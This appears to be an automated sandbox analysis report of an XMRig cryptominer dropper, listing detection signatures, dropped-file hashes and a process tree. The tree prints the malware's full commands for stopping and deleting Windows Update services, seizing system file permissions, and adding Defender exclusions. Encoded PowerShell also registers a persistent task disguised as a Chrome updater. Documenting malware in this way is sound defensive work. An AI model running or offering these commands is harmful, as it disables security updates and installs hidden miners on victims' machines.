Analysis
-
max time kernel
302s -
max time network
267s -
platform
windows10-1703_x64 -
resource
win10-20220715-en -
resource tags
-
submitted
15-07-2022 22:15
General
-
Target
17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6.exe
-
Size
7.6MB
-
MD5
2169dc30793b25843551c51894827089
-
SHA1
6ce2a8226221e154905127e88c0b022d4a89fac5
-
SHA256
17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6
-
SHA512
4731809e0f8aa22e3b90a5b81942b20997338ba91489ccc97e054300bdfc9604fb6e66a0ff83738cbee16138a55f4727f9fcddaba3cbcb78bb59bd14cd9e89bc
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
-
XMRig Miner payload 3 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 2 IoCs
-
Possible privilege escalation attempt 4 IoCs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 2 IoCs
-
Modifies file permissions 1 TTPs 4 IoCs
-
Themida packer 7 IoCs
Detects Themida, an advanced Windows software protection system.
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 4 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies Internet Explorer settings 1 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Modifies registry key 1 TTPs 18 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious behavior: MapViewOfSection 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6.exe"C:\Users\Admin\AppData\Local\Temp\17bcc303f2a3cc59084318d7ae9933b9168e1f47276b077676c8c80efb7f82c6.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Temp\setup.exe"C:\Windows\Temp\setup.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"3⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG8AZAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYgBuAGQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAdgAjAD4A"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAeAAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAFAAQQBBAGoAQQBIAEUAQQBhAHcAQQBqAEEARAA0AEEASQBBAEIAVABBAEgAUQBBAFkAUQBCAHkAQQBIAFEAQQBMAFEAQgBRAEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBDAEEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEASQBBAEIARwBBAEcAawBBAGIAQQBCAGwAQQBIAE0AQQBYAEEAQgBIAEEARwA4AEEAYgB3AEIAbgBBAEcAdwBBAFoAUQBCAGMAQQBFAE0AQQBhAEEAQgB5AEEARwA4AEEAYgBRAEIAbABBAEYAdwBBAGQAUQBCAHcAQQBHAFEAQQBZAFEAQgAwAEEARwBVAEEAYwBnAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQB0AEEARgBZAEEAWgBRAEIAeQBBAEcASQBBAEkAQQBCAFMAQQBIAFUAQQBiAGcAQgBCAEEASABNAEEASQBBAEEAOABBAEMATQBBAGUAZwBCAHkAQQBIAFkAQQBJAHcAQQArAEEAQQA9AD0AIgAnACkAIAA8ACMAYwBtAGsAcgAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQAUwB0AGEAcgB0AHUAcAApACAAPAAjAHUAegBkACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAYwB2AHQAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBmAHcAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABzAGUAdAB1AHAALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwB1AGQAYgB1ACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBxAGsAeABtACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="4⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\run.bat" "2⤵
- Drops startup file
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\lol.bat" "2⤵
- Checks computer location settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHEAawAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAegByAHYAIwA+AA=="1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"3⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG8AZAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYgBuAGQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAdgAjAD4A"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "ivghlzjths"4⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe vvvdfgdxkkyjtyx1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8V1TH/rzrH+5OFPPAv1/5dL41W8yrIZ7P3dmb8QzXJF+4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.3MB
MD584029d73b99cc7e8b7e80d61143a532f
SHA1518c2673fb0de02b6eab1fb7f2a28e46761370ba
SHA256e3c6f2d415a9f9d4f845ba2cd8ef07986a6b4db1d50b145b548b907c26fef772
SHA51250ed354e3a76affa07e94984b40c13ab5c3ecb7285047550613c6b80235c04feb2ad303e32ec04c81864e2c652270c788311e4223bfe0e94a7addba8cd127e62
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.3MB
MD584029d73b99cc7e8b7e80d61143a532f
SHA1518c2673fb0de02b6eab1fb7f2a28e46761370ba
SHA256e3c6f2d415a9f9d4f845ba2cd8ef07986a6b4db1d50b145b548b907c26fef772
SHA51250ed354e3a76affa07e94984b40c13ab5c3ecb7285047550613c6b80235c04feb2ad303e32ec04c81864e2c652270c788311e4223bfe0e94a7addba8cd127e62
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD55ad6eef00c834518f5a8028b00e65d28
SHA17e55b8b9800a0258d3984805f1f41c5457a6b120
SHA256b9ee410f6b7e43408166ea99363097fdd8c7b752a7fffa4c0db029902f7bd57c
SHA512b197565802be159267307682413a0e0b7fb4bbe04fd5c741f1090db17068595bbe1b3cac421380547f1d00267c9be97eda3163cd98c3e28b8dd865a38708f537
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751Filesize
717B
MD5ec8ff3b1ded0246437b1472c69dd1811
SHA1d813e874c2524e3a7da6c466c67854ad16800326
SHA256e634c2d1ed20e0638c95597adf4c9d392ebab932d3353f18af1e4421f4bb9cab
SHA512e967b804cbf2d6da30a532cbc62557d09bd236807790040c6bee5584a482dc09d724fc1d9ac0de6aa5b4e8b1fff72c8ab3206222cc2c95a91035754ac1257552
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\DEA9A74F8A5FD9E6E106F171664C0B96Filesize
503B
MD51f58a1374dd403dc4b1bfaa26d2fff2b
SHA153c3208492f54f977119af4312e1cc3e422a13b6
SHA2568415b13b47555986b42fbe01800f4835039d7191618e581f2055589f90d5e0fc
SHA5126fce40d1a5c04a8fe36aa7e010e9153025e3091efe40b1247b4dd3af3bb584b6e96e0c4d9e5e5839dd47582ae578f600958e77f34b3ed8d013af2a6a7053f423
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751Filesize
192B
